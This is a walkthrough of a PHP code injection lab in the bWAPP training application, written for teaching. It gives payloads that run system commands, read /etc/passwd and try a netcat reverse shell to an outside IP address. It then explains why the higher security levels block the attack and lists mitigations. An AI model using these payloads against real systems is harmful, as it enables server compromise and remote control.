bWAPP - PHP Code Injection

bWAPP – PHP Code Injection

In this walk through, we will be going through the PHP Code Injection vulnerability section from bWAPP Labs. We will be exploring and exploiting PHP Code Injection on a test page and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

PHP Code Injection

Security: Low

  • Setting the security level to Low.

Security level Low

  • The application issues a get request when clicked on the message and displays the message. By default the message is set to “test”

PHP Code Injection

testing

Burpsuite intercept

  • I used the below payload to check if the application is vulnerable to PHP injection attack and i got the output.

localhost/phpi.php?message=Hello;system("whoami");
localhost/phpi.php?message=Hello;phpinfo()

testing code injection

Code Injection confirmed

localhost/phpi.php?message=Hello;system("cat /etc/passwd")

/etc/passwd output

  • I tried to get a reverse shell using the below payload however was unable to due to some reason.

localhost/phpi.php?message=test;system("nc 192.168.29.81 4444 -e /bin/bash");

Security: Medium & High

  • Application is not vulnerable in Medium and High level as the code is now using htmlspecialchars function instead of the vulnerable eval function.

Application source code

Also Read: bWAPP – OS Command Injection

Conclusion:

Conclusion

So, we finally completed all the security levels for the bWAPP PHP Code Injection Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. PHP Code Injection attacks can be mitigated by avoiding dangerous functions like exec(), shell_exec(), system() and passthru(). Along with that, we should perform code serialization and use PHP security linter. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top